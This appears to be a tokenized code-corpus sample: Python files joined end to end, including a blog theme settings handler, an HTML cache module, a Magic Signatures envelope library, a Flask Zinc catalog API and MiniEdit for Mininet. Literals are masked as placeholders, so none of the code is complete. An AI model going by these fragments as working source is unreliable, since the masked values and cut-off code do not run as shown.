'<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT:\n>' ) <EOL> user . extra_body_end_html = self . get_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT:\n>' ) <EOL> user . logo = url_factory . clean_filename ( <EOL> self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> user . google_analytics = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> user . adult_content = int ( self . get_argument ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> user . tipjar = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> user . sidebar_ad = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> user . newsletter_endpoint = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> user . license = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> default_stylesheet = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> stylesheet = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> theme = url_factory . clean_filename ( self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> static_path = self . application . settings [ "<STR_LIT>" ] <EOL> theme = os . path . join ( static_path , os . path . dirname ( theme ) ) <EOL> user_path = os . path . join ( <EOL> self . application . settings [ "<STR_LIT>" ] , user . username ) <EOL> theme_path = os . path . join ( user_path , '<STR_LIT>' ) <EOL> current_theme_path = os . path . join ( theme_path , '<STR_LIT>' ) <EOL> compiled_stylesheet_path = os . path . join ( <EOL> current_theme_path , '<STR_LIT>' ) <EOL> default_stylesheet_path = os . path . join ( <EOL> current_theme_path , '<STR_LIT>' ) <EOL> if theme != current_theme_path : <EOL> if os . path . exists ( current_theme_path ) : <EOL> shutil . rmtree ( current_theme_path ) <EOL> shutil . copytree ( theme , current_theme_path ) <EOL> f = open ( compiled_stylesheet_path , '<STR_LIT:w>' ) <EOL> f . write ( stylesheet ) <EOL> f . close ( ) <EOL> f = open ( default_stylesheet_path , '<STR_LIT:w>' ) <EOL> f . write ( default_stylesheet ) <EOL> f . close ( ) <EOL> user . theme = compiled_stylesheet_path [ len ( <EOL> self . application . settings [ "<STR_LIT>" ] ) + <NUM_LIT:1> : ] <EOL> user . save ( ) <EOL> self . set_status ( <NUM_LIT> ) </s>
<s> import gzip <EOL> import os <EOL> import re <EOL> import shutil <EOL> from logic import url_factory <EOL> try : <EOL> from io import BytesIO <EOL> except ImportError : <EOL> from cStringIO import StringIO as BytesIO <EOL> EXTENSION = '<STR_LIT:html>' <EOL> def get_full_filename ( handler , url = None ) : <EOL> if not url : <EOL> url = handler . prefix + handler . breadcrumbs [ '<STR_LIT>' ] <EOL> elif not url . startswith ( handler . prefix ) : <EOL> url = handler . prefix + url <EOL> filename = url_factory . clean_filename ( url ) <EOL> path = os . path . join ( handler . application . settings [ "<STR_LIT>" ] , filename + <EOL> '<STR_LIT:.>' + EXTENSION ) <EOL> parent_directory = os . path . dirname ( path ) <EOL> if not os . path . isdir ( parent_directory ) : <EOL> os . makedirs ( parent_directory ) <EOL> return path <EOL> def add ( handler , content , rendered_content ) : <EOL> if not rendered_content : <EOL> return <EOL> try : <EOL> rendered_content += '<STR_LIT>' <EOL> full_path = get_full_filename ( handler , handler . content_url ( content ) ) <EOL> f = open ( full_path , '<STR_LIT:wb>' ) <EOL> f . write ( rendered_content ) <EOL> f . close ( ) <EOL> except Exception as ex : <EOL> pass <EOL> def remove ( handler , url = None ) : <EOL> try : <EOL> filename = get_full_filename ( handler , url ) <EOL> os . remove ( filename ) <EOL> if os . path . isdir ( filename [ : - len ( EXTENSION ) ] ) : <EOL> invalidate ( filename [ : - len ( EXTENSION ) ] ) <EOL> except : <EOL> pass <EOL> def invalidate ( cache_path ) : <EOL> try : <EOL> shutil . rmtree ( cache_path ) <EOL> except : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import base64 <EOL> import re <EOL> import sys <EOL> import time <EOL> try : <EOL> import xml . etree . ElementTree as et <EOL> except ImportError : <EOL> try : <EOL> import elementtree as et <EOL> except ImportError : <EOL> raise <EOL> import magicsigalg <EOL> _WHITESPACE_RE = re . compile ( r'<STR_LIT>' ) <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> Exception . __init__ ( self ) <EOL> def NormalizeUserIdToUri ( userid ) : <EOL> """<STR_LIT>""" <EOL> userid = userid . strip ( ) <EOL> if ( userid . startswith ( '<STR_LIT>' ) or <EOL> userid . startswith ( '<STR_LIT>' ) or <EOL> userid . startswith ( '<STR_LIT>' ) ) : <EOL> return userid <EOL> if userid . find ( '<STR_LIT:@>' ) > <NUM_LIT:0> : <EOL> return '<STR_LIT>' + userid <EOL> return '<STR_LIT>' + userid <EOL> def _GetElementByTagName ( e , ns , tag_name ) : <EOL> """<STR_LIT>""" <EOL> seq = e . getElementsByTagNameNS ( unicode ( ns ) , unicode ( tag_name ) ) <EOL> if seq . length == <NUM_LIT:0> : raise ValueError ( '<STR_LIT>' % tag_name ) <EOL> if seq . length > <NUM_LIT:1> : raise ValueError ( '<STR_LIT>' % <EOL> tag_name ) <EOL> return seq . item ( <NUM_LIT:0> ) <EOL> class KeyRetriever ( object ) : <EOL> """<STR_LIT>""" <EOL> def LookupPublicKey ( self , signer_uri ) : <EOL> if not signer_uri : <EOL> return None <EOL> return ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def LookupPrivateKey ( self , signer_uri ) : <EOL> """<STR_LIT>""" <EOL> return self . LookupPublicKey ( signer_uri ) <EOL> _ATOM_NS_URL = '<STR_LIT>' <EOL> _ME_NS_URL = '<STR_LIT>' <EOL> _ATOM_NS = '<STR_LIT>' % _ATOM_NS_URL <EOL> _ME_NS = '<STR_LIT>' % _ME_NS_URL <EOL> try : <EOL> __register_namespace = et . register_namespace <EOL> except AttributeError : <EOL> def __register_namespace ( prefix , uri ) : <EOL> et . _namespace_map [ uri ] = prefix <EOL> __register_namespace ( '<STR_LIT>' , _ATOM_NS_URL ) <EOL> __register_namespace ( '<STR_LIT>' , _ME_NS_URL ) <EOL> __register_namespace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> class MagicEnvelopeProtocol ( object ) : <EOL> """<STR_LIT>""" <EOL> ENCODING = '<STR_LIT>' <EOL> key_retriever = KeyRetriever ( ) <EOL> def GetPrivateKey ( self , signer_uri ) : <EOL> """<STR_LIT>""" <EOL> return self . key_retriever . LookupPrivateKey ( signer_uri ) <EOL> def GetPublicKey ( self , signer_uri ) : <EOL> """<STR_LIT>""" <EOL> return self . key_retriever . LookupPublicKey ( signer_uri ) <EOL> def GetSignerURI ( self , data ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( data , et . ElementTree ) : <EOL> d = data <EOL> else : <EOL> d = et . ElementTree ( ) <EOL> data = data . encode ( '<STR_LIT:utf8>' ) if type ( data ) is unicode else data <EOL> d . _setroot ( et . XML ( data ) ) <EOL> auth_uris = d . getroot ( ) . findall ( _ATOM_NS + '<STR_LIT>' + _ATOM_NS + '<STR_LIT>' ) <EOL> for u in auth_uris : <EOL> return NormalizeUserIdToUri ( u . text ) <EOL> def IsAllowedSigner ( self , data , userid_uri ) : <EOL> """<STR_LIT>""" <EOL> return self . GetSignerURI ( data ) == userid_uri <EOL> def Verify ( self , env ) : <EOL> """<STR_LIT>""" <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> assert env [ '<STR_LIT>' ] == self . ENCODING <EOL> text = base64 . urlsafe_b64decode ( env [ '<STR_LIT:data>' ] . encode ( '<STR_LIT:utf-8>' ) ) <EOL> signer_uri = self . GetSignerURI ( text ) <EOL> verifier = magicsigalg . SignatureAlgRsaSha256 ( self . GetKeypair ( signer_uri ) ) <EOL> return verifier . Verify ( env [ '<STR_LIT:data>' ] , env [ '<STR_LIT>' ] ) <EOL> def GetSigningAlg ( self , signing_key ) : <EOL> """<STR_LIT>""" <EOL> if signing_key == '<STR_LIT>' : <EOL> signing_key = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return magicsigalg . SignatureAlgRsaSha256 ( signing_key ) <EOL> def GetVerifierAlg ( self , public_key ) : <EOL> """<STR_LIT>""" <EOL> return magicsigalg . SignatureAlgRsaSha256 ( public_key ) <EOL> def EncodeData ( self , raw_text_data , encoding ) : <EOL> """<STR_LIT>""" <EOL> if encoding != '<STR_LIT>' : <EOL> raise ValueError ( '<STR_LIT>' % encoding ) <EOL> return base64 . urlsafe_b64encode ( <EOL> unicode ( raw_text_data ) . encode ( '<STR_LIT:utf-8>' ) ) . encode ( '<STR_LIT:utf-8>' ) <EOL> def DecodeData ( self , encoded_text_data , encoding ) : <EOL> """<STR_LIT>""" <EOL> if encoding != '<STR_LIT>' : <EOL> raise ValueError ( '<STR_LIT>' % encoding ) <EOL> return base64 . urlsafe_b64decode ( encoded_text_data . encode ( '<STR_LIT:utf-8>' ) ) <EOL> def ParseData ( self , raw_text_data , mime_type ) : <EOL> """<STR_LIT>""" <EOL> if mime_type != '<STR_LIT>' : <EOL> raise ValueError ( '<STR_LIT>' % mime_type ) <EOL> d = et . ElementTree ( ) <EOL> raw_text_data = raw_text_data . encode ( '<STR_LIT:utf8>' ) if type ( raw_text_data ) is unicode else raw_text_data <EOL> d . _setroot ( et . XML ( raw_text_data ) ) <EOL> return d <EOL> def Parse ( self , textinput , mime_type = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> ns = '<STR_LIT>' <EOL> d = et . ElementTree ( ) <EOL> textinput = textinput . strip ( ) <EOL> textinput = textinput . encode ( '<STR_LIT:utf8>' ) if type ( textinput ) is unicode else textinput <EOL> d . _setroot ( et . XML ( textinput ) ) <EOL> if d . getroot ( ) . tag == _ATOM_NS + '<STR_LIT>' : <EOL> env_el = d . find ( _ME_NS + '<STR_LIT>' ) <EOL> elif d . getroot ( ) . tag == _ME_NS + '<STR_LIT>' : <EOL> env_el = d . getroot ( ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> def Squeeze ( s ) : <EOL> return re . sub ( _WHITESPACE_RE , '<STR_LIT>' , s ) <EOL> data_el = env_el . find ( _ME_NS + '<STR_LIT:data>' ) <EOL> return dict ( <EOL> data = Squeeze ( data_el . text ) , <EOL> encoding = env_el . findtext ( _ME_NS + '<STR_LIT>' ) , <EOL> data_type = data_el . get ( '<STR_LIT:type>' ) , <EOL> alg = env_el . findtext ( _ME_NS + '<STR_LIT>' ) , <EOL> sig = Squeeze ( env_el . findtext ( _ME_NS + '<STR_LIT>' ) ) , <EOL> ) <EOL> class EnvelopeError ( Error ) : <EOL> """<STR_LIT>""" <EOL> invalid_envelope = None <EOL> error_text = None <EOL> context = None <EOL> def __init__ ( self , envelope , err , context = None ) : <EOL> self . invalid_envelope = envelope <EOL> self . error_text = err <EOL> self . context = context <EOL> Error . __init__ ( self ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . error_text , self . invalid_envelope , self . context ) <EOL> class Envelope ( object ) : <EOL> """<STR_LIT>""" <EOL> _data = None <EOL> _data_type = None <EOL> _encoding = None <EOL> _alg = None <EOL> _sig = None <EOL> _parsed_data = None <EOL> _signer_uri = None <EOL> _signer_key = None <EOL> _init_timestamp = None <EOL> def __init__ ( self , <EOL> protocol = MagicEnvelopeProtocol ( ) , <EOL> ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . _protocol = protocol <EOL> self . _Initialize ( kwargs ) <EOL> if self . _sig : <EOL> self . _PerformVerification ( ) <EOL> elif self . _signer_key : <EOL> self . _Sign ( ) <EOL> else : <EOL> raise EnvelopeError ( self , '<STR_LIT>' ) <EOL> except EnvelopeError : <EOL> raise <EOL> self . _init_timestamp = time . time ( ) <EOL> def _Initialize ( self , kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . _mime_type = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . _document = kwargs . get ( '<STR_LIT>' , None ) <EOL> if self . _document : <EOL> fields = self . _protocol . Parse ( self . _document , self . _mime_type ) <EOL> kwargs . update ( fields ) <EOL> self . _data = kwargs . get ( '<STR_LIT:data>' , None ) <EOL> self . _data_type = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . _encoding = kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _alg = kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _sig = kwargs . get ( '<STR_LIT>' , None ) <EOL> if not self . _data_type : <EOL> raise EnvelopeError ( self , '<STR_LIT>' ) <EOL> if self . _alg != '<STR_LIT>' : <EOL> raise EnvelopeError ( self , '<STR_LIT>' % <EOL> self . _alg ) <EOL> if self . _encoding != '<STR_LIT>' : <EOL> raise EnvelopeError ( self , '<STR_LIT>' % <EOL> self . _encoding ) <EOL> raw_data = kwargs . get ( '<STR_LIT>' , None ) <EOL> if raw_data : <EOL> assert self . _data_type <EOL> assert not self . _sig <EOL> assert not self . _data <EOL> assert '<STR_LIT>' in kwargs <EOL> assert '<STR_LIT>' in kwargs <EOL> self . _parsed_data = self . _protocol . ParseData ( raw_data , <EOL> self . _data_type ) <EOL> self . _data = self . _protocol . EncodeData ( raw_data , <EOL> self . _encoding ) <EOL> self . _signer_uri = kwargs [ '<STR_LIT>' ] <EOL> self . _signer_key = kwargs [ '<STR_LIT>' ] <EOL> elif self . _sig : <EOL> if not self . _data : <EOL> raise EnvelopeError ( self , '<STR_LIT>' ) <EOL> raw_data = self . _protocol . DecodeData ( self . _data , self . _encoding ) <EOL> else : <EOL> raise EnvelopeError ( self , '<STR_LIT>' ) <EOL> self . _parsed_data = self . _protocol . ParseData ( raw_data , self . _data_type ) <EOL> self . _init_timestamp = None <EOL> def Age ( self ) : <EOL> """<STR_LIT>""" <EOL> assert self . _init_timestamp <EOL> return self . _init_timestamp - time . time ( ) <EOL> def _Sign ( self ) : <EOL> """<STR_LIT>""" <EOL> assert self . _signer_uri <EOL> assert self . _signer_key <EOL> assert self . _protocol . IsAllowedSigner ( self . _parsed_data , self . _signer_uri ) <EOL> signature_alg = self . _protocol . GetSigningAlg ( self . _signer_key ) <EOL> self . _sig = signature_alg . Sign ( self . _data ) <EOL> self . _alg = signature_alg . GetName ( ) <EOL> assert signature_alg . Verify ( self . _data , self . _sig ) <EOL> def _PerformVerification ( self ) : <EOL> """<STR_LIT>""" <EOL> text = base64 . urlsafe_b64decode ( self . _data . encode ( '<STR_LIT:utf-8>' ) ) <EOL> self . _parsed_data = self . _protocol . ParseData ( text , self . _data_type ) <EOL> self . _signer_uri = self . _protocol . GetSignerURI ( self . _parsed_data ) <EOL> self . _signer_public_key = self . _protocol . GetPublicKey ( self . _signer_uri ) <EOL> verifier = self . _protocol . GetVerifierAlg ( self . _signer_public_key ) <EOL> if not verifier . Verify ( self . _data , self . _sig ) : <EOL> raise EnvelopeError ( self , '<STR_LIT>' ) <EOL> def ToXML ( self , fulldoc = True , indentation = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> assert self . _init_timestamp <EOL> if fulldoc : <EOL> template = '<STR_LIT>' <EOL> else : <EOL> template = '<STR_LIT>' <EOL> template += """<STR_LIT>""" <EOL> text = template % ( self . _encoding , <EOL> _ToPretty ( self . _data , <NUM_LIT:4> , <NUM_LIT> ) , <EOL> self . _alg , <EOL> _ToPretty ( self . _sig , <NUM_LIT:4> , <NUM_LIT> ) ) <EOL> indented_text = '<STR_LIT>' <EOL> for line in text . strip ( ) . split ( '<STR_LIT:\n>' ) : <EOL> indented_text += '<STR_LIT:U+0020>' * indentation + line + '<STR_LIT:\n>' <EOL> return indented_text <EOL> def ToAtom ( self , fulldoc = True , indentation = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> if not self . _parsed_data : <EOL> self . _parsed_data = self . _protocol . ParseData ( text , self . _data_type ) <EOL> d = self . _parsed_data <EOL> assert d . getroot ( ) . tag == _ATOM_NS + '<STR_LIT>' <EOL> prov_el = et . Element ( _ME_NS + '<STR_LIT>' ) <EOL> data_el = et . SubElement ( prov_el , _ME_NS + '<STR_LIT:data>' ) <EOL> data_el . set ( '<STR_LIT:type>' , self . _data_type ) <EOL> data_el . text = '<STR_LIT:\n>' + _ToPretty ( self . _data , indentation + <NUM_LIT:6> , <NUM_LIT> ) <EOL> et . SubElement ( prov_el , _ME_NS + '<STR_LIT>' ) . text = self . _encoding <EOL> et . SubElement ( prov_el , _ME_NS + '<STR_LIT>' ) . text = '<STR_LIT:\n>' + _ToPretty ( self . _sig , <EOL> indentation + <NUM_LIT:6> , <EOL> <NUM_LIT> ) <EOL> d . getroot ( ) . append ( prov_el ) <EOL> self . _PrettyIndent ( d . getroot ( ) , indentation / <NUM_LIT:2> ) <EOL> text = et . tostring ( d . getroot ( ) , encoding = '<STR_LIT:utf-8>' ) <EOL> indented_text = '<STR_LIT>' <EOL> for line in text . strip ( ) . split ( '<STR_LIT:\n>' ) : <EOL> if line . strip ( ) != '<STR_LIT>' : <EOL> indented_text += '<STR_LIT:U+0020>' * indentation + line + '<STR_LIT:\n>' <EOL> if fulldoc : <EOL> indented_text = ( '<STR_LIT>' + <EOL> indented_text ) <EOL> return indented_text <EOL> def GetData ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _protocol . Decode ( self . _data , self . _encoding ) <EOL> def GetParsedData ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . _parsed_data : <EOL> self . _parsed_data = self . _protocol . ParseData ( <EOL> self . _protocol . Decode ( self . _data ) , <EOL> self . _data_type ) <EOL> return self . _parsed_data <EOL> def GetDataWithProvenance ( self ) : <EOL> """<STR_LIT>""" <EOL> def GetParsedDataWithProvenance ( self ) : <EOL> """<STR_LIT>""" <EOL> def _PrettyIndent ( self , elem , level = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> i = "<STR_LIT:\n>" + level * "<STR_LIT:U+0020>" <EOL> if len ( elem ) : <EOL> if not elem . text or not elem . text . strip ( ) : <EOL> elem . text = i + "<STR_LIT:U+0020>" <EOL> if not elem . tail or not elem . tail . strip ( ) : <EOL> elem . tail = i <EOL> for elem in elem : <EOL> self . _PrettyIndent ( elem , level + <NUM_LIT:1> ) <EOL> if not elem . tail or not elem . tail . strip ( ) : <EOL> elem . tail = i <EOL> else : <EOL> if level and ( not elem . tail or not elem . tail . strip ( ) ) : <EOL> elem . tail = i <EOL> def _ToPretty ( text , indent , linelength ) : <EOL> """<STR_LIT>""" <EOL> tl = linelength - indent <EOL> output = '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , len ( text ) , tl ) : <EOL> if output : <EOL> output += '<STR_LIT:\n>' <EOL> output += '<STR_LIT:U+0020>' * indent + text [ i : i + tl ] <EOL> return output </s>
<s> import os <EOL> import json <EOL> import base64 <EOL> import hmac , hashlib <EOL> from redis import Redis <EOL> from rq import Queue <EOL> from flask import Flask , request , abort , make_response , Response <EOL> from boto . s3 . connection import S3Connection <EOL> from zinc . catalog import ZincCatalogPathHelper <EOL> from zinc . services import ZincCatalog <EOL> from zinc . coordinators . redis import RedisCatalogCoordinator <EOL> from zinc . storages . aws import S3StorageBackend <EOL> from config import CONFIG <EOL> API_VERSION = '<STR_LIT:1.0>' <EOL> REDIS_URL = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> REDIS = Redis . from_url ( REDIS_URL ) <EOL> S3 = S3Connection ( CONFIG [ '<STR_LIT>' ] , CONFIG [ '<STR_LIT>' ] ) <EOL> Coordinator = RedisCatalogCoordinator ( redis = REDIS ) <EOL> Q = Queue ( connection = REDIS ) <EOL> Jobs = dict ( ) <EOL> Catalogs = dict ( ) <EOL> app = Flask ( __name__ ) <EOL> def get_catalog ( catalog_id ) : <EOL> catalog = Catalogs . get ( catalog_id ) <EOL> if catalog is None : <EOL> storage = S3StorageBackend ( <EOL> s3connection = S3 , <EOL> bucket = CONFIG [ '<STR_LIT>' ] , <EOL> prefix = catalog_id ) <EOL> catalog = ZincCatalog ( coordinator = Coordinator , storage = storage ) <EOL> Catalogs [ catalog_id ] = catalog <EOL> return catalog <EOL> @ app . after_request <EOL> def after_request ( response ) : <EOL> response . headers . add ( '<STR_LIT>' , API_VERSION ) <EOL> return response <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def catalog_index ( catalog_id ) : <EOL> return get_catalog ( catalog_id ) . get_index ( ) . to_bytes ( ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def manifest ( catalog_id , bundle , version = None ) : <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return get_catalog ( catalog_id ) . get_manifest ( bundle , version ) . to_bytes ( ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> catalog = get_catalog ( catalog_id ) <EOL> filelist = request . form [ '<STR_LIT>' ] <EOL> force = True <EOL> job = Q . enqueue ( catalog . update_bundle , bundle , filelist , force = force ) <EOL> Jobs [ job . id ] = job <EOL> return job . id <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def tag ( catalog_id , bundle , tag ) : <EOL> if request . method == '<STR_LIT>' : <EOL> catalog = get_catalog ( catalog_id ) <EOL> version = int ( request . form [ '<STR_LIT:version>' ] ) <EOL> catalog . update_distribution ( tag , bundle , version ) <EOL> if request . method == '<STR_LIT>' : <EOL> catalog = get_catalog ( catalog_id ) <EOL> catalog . delete_distribution ( tag , bundle ) <EOL> response = make_response ( ) <EOL> response . status_code = <NUM_LIT:200> <EOL> return response <EOL> def upload_key ( catalog_id , sha ) : <EOL> return catalog_id + '<STR_LIT>' + sha <EOL> def build_policy ( catalog_id , sha ) : <EOL> policy = dict ( ) <EOL> policy [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> policy [ '<STR_LIT>' ] = [ <EOL> { '<STR_LIT>' : CONFIG [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT:key>' : upload_key ( catalog_id , sha ) } , <EOL> ] <EOL> return policy <EOL> def base64_policy ( policy ) : <EOL> return base64 . b64encode ( json . dumps ( policy ) ) <EOL> def sign_policy ( policy64 ) : <EOL> signature = base64 . b64encode ( <EOL> hmac . new ( CONFIG [ '<STR_LIT>' ] , policy64 , hashlib . sha1 ) . digest ( ) ) <EOL> return signature <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' ] ) <EOL> def upload ( catalog_id , sha ) : <EOL> catalog = get_catalog ( catalog_id ) <EOL> info = catalog . _get_file_info ( sha ) <EOL> if info is not None : <EOL> abort ( <NUM_LIT> , '<STR_LIT>' ) <EOL> return <EOL> policy = build_policy ( catalog_id , sha ) <EOL> policy64 = base64_policy ( policy ) <EOL> signature = sign_policy ( policy64 ) <EOL> response_data = dict ( ) <EOL> response_data [ '<STR_LIT>' ] = policy64 <EOL> response_data [ '<STR_LIT>' ] = signature <EOL> response_data [ '<STR_LIT>' ] = CONFIG [ '<STR_LIT>' ] <EOL> response_data [ '<STR_LIT:key>' ] = upload_key ( catalog_id , sha ) <EOL> js = json . dumps ( response_data ) <EOL> resp = Response ( js , status = <NUM_LIT:200> , mimetype = '<STR_LIT:application/json>' ) <EOL> return resp <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> port = int ( os . environ . get ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> app . run ( host = '<STR_LIT>' , port = port ) </s>
<s> from __future__ import absolute_import <EOL> from django . test import RequestFactory <EOL> from django . contrib . auth . models import AnonymousUser <EOL> from django_cas_ng . middleware import CASMiddleware <EOL> from django_cas_ng import views <EOL> def _process_view_with_middleware ( <EOL> middleware_cls , url , view_func ) : <EOL> middleware = middleware_cls ( ) <EOL> request_factory = RequestFactory ( ) <EOL> request = request_factory . get ( url ) <EOL> request . user = AnonymousUser ( ) <EOL> return middleware . process_view ( request , view_func , <EOL> view_args = ( ) , view_kwargs = { } ) <EOL> def test_root_as_cas_admin_prefix_with_cas_login ( monkeypatch , settings ) : <EOL> monkeypatch . setattr ( '<STR_LIT>' , <EOL> lambda func : "<STR_LIT>" ) <EOL> settings . CAS_ADMIN_PREFIX = "<STR_LIT:/>" <EOL> response = _process_view_with_middleware ( <EOL> CASMiddleware , '<STR_LIT>' , views . login ) <EOL> assert response is None <EOL> def test_root_as_cas_admin_prefix_with_cas_logout ( monkeypatch , settings ) : <EOL> monkeypatch . setattr ( '<STR_LIT>' , <EOL> lambda func : "<STR_LIT>" ) <EOL> settings . CAS_ADMIN_PREFIX = "<STR_LIT:/>" <EOL> response = _process_view_with_middleware ( <EOL> CASMiddleware , '<STR_LIT>' , views . logout ) <EOL> assert response is None </s>
<s> """<STR_LIT>""" <EOL> MINIEDIT_VERSION = '<STR_LIT>' <EOL> from optparse import OptionParser <EOL> from Tkinter import ( Frame , Label , LabelFrame , Entry , OptionMenu , Checkbutton , <EOL> Menu , Toplevel , Button , BitmapImage , PhotoImage , Canvas , <EOL> Scrollbar , Wm , TclError , StringVar , IntVar , <EOL> E , W , EW , NW , Y , VERTICAL , SOLID , CENTER , <EOL> RIGHT , LEFT , BOTH , TRUE , FALSE ) <EOL> from ttk import Notebook <EOL> from tkMessageBox import showerror <EOL> from subprocess import call <EOL> import tkFont <EOL> import tkFileDialog <EOL> import tkSimpleDialog <EOL> import re <EOL> import json <EOL> from distutils . version import StrictVersion <EOL> import os <EOL> import sys <EOL> from functools import partial <EOL> if '<STR_LIT>' in os . environ : <EOL> sys . path = os . environ [ '<STR_LIT>' ] . split ( '<STR_LIT::>' ) + sys . path <EOL> from mininet . log import info , setLogLevel <EOL> from mininet . net import Mininet , VERSION <EOL> from mininet . util import netParse , ipAdd , quietRun <EOL> from mininet . util import buildTopo <EOL> from mininet . util import custom , customClass <EOL> from mininet . term import makeTerm , cleanUpScreens <EOL> from mininet . node import Controller , RemoteController , NOX , OVSController <EOL> from mininet . node import CPULimitedHost , Host , Node <EOL> from mininet . node import OVSSwitch , UserSwitch <EOL> from mininet . link import TCLink , Intf , Link <EOL> from mininet . cli import CLI <EOL> from mininet . moduledeps import moduleDeps <EOL> from mininet . topo import SingleSwitchTopo , LinearTopo , SingleSwitchReversedTopo <EOL> from mininet . topolib import TreeTopo <EOL> print '<STR_LIT>' + VERSION <EOL> MININET_VERSION = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , VERSION ) <EOL> if StrictVersion ( MININET_VERSION ) > StrictVersion ( '<STR_LIT>' ) : <EOL> from mininet . node import IVSSwitch <EOL> TOPODEF = '<STR_LIT:none>' <EOL> TOPOS = { '<STR_LIT>' : lambda : SingleSwitchTopo ( k = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : LinearTopo , <EOL> '<STR_LIT>' : SingleSwitchReversedTopo , <EOL> '<STR_LIT>' : SingleSwitchTopo , <EOL> '<STR_LIT:none>' : None , <EOL> '<STR_LIT>' : TreeTopo } <EOL> CONTROLLERDEF = '<STR_LIT>' <EOL> CONTROLLERS = { '<STR_LIT>' : Controller , <EOL> '<STR_LIT>' : OVSController , <EOL> '<STR_LIT>' : NOX , <EOL> '<STR_LIT>' : RemoteController , <EOL> '<STR_LIT:none>' : lambda name : None } <EOL> LINKDEF = '<STR_LIT:default>' <EOL> LINKS = { '<STR_LIT:default>' : Link , <EOL> '<STR_LIT>' : TCLink } <EOL> HOSTDEF = '<STR_LIT>' <EOL> HOSTS = { '<STR_LIT>' : Host , <EOL> '<STR_LIT>' : custom ( CPULimitedHost , sched = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : custom ( CPULimitedHost , sched = '<STR_LIT>' ) } <EOL> class InbandController ( RemoteController ) : <EOL> "<STR_LIT>" <EOL> def checkListening ( self ) : <EOL> "<STR_LIT>" <EOL> return <EOL> class CustomUserSwitch ( UserSwitch ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , name , dpopts = '<STR_LIT>' , ** kwargs ) : <EOL> UserSwitch . __init__ ( self , name , ** kwargs ) <EOL> self . switchIP = None <EOL> def getSwitchIP ( self ) : <EOL> "<STR_LIT>" <EOL> return self . switchIP <EOL> def setSwitchIP ( self , ip ) : <EOL> "<STR_LIT>" <EOL> self . switchIP = ip <EOL> def start ( self , controllers ) : <EOL> "<STR_LIT>" <EOL> UserSwitch . start ( self , controllers ) <EOL> if self . switchIP is not None : <EOL> if not self . inNamespace : <EOL> self . cmd ( '<STR_LIT>' , self , self . switchIP ) <EOL> else : <EOL> self . cmd ( '<STR_LIT>' , self . switchIP ) <EOL> class LegacyRouter ( Node ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , name , inNamespace = True , ** params ) : <EOL> Node . __init__ ( self , name , inNamespace , ** params ) <EOL> def config ( self , ** _params ) : <EOL> if self . intfs : <EOL> self . setParam ( _params , '<STR_LIT>' , ip = '<STR_LIT>' ) <EOL> r = Node . config ( self , ** _params ) <EOL> self . cmd ( '<STR_LIT>' ) <EOL> return r <EOL> class LegacySwitch ( OVSSwitch ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , name , ** params ) : <EOL> OVSSwitch . __init__ ( self , name , failMode = '<STR_LIT>' , ** params ) <EOL> self . switchIP = None <EOL> class customOvs ( OVSSwitch ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , name , failMode = '<STR_LIT>' , datapath = '<STR_LIT>' , ** params ) : <EOL> 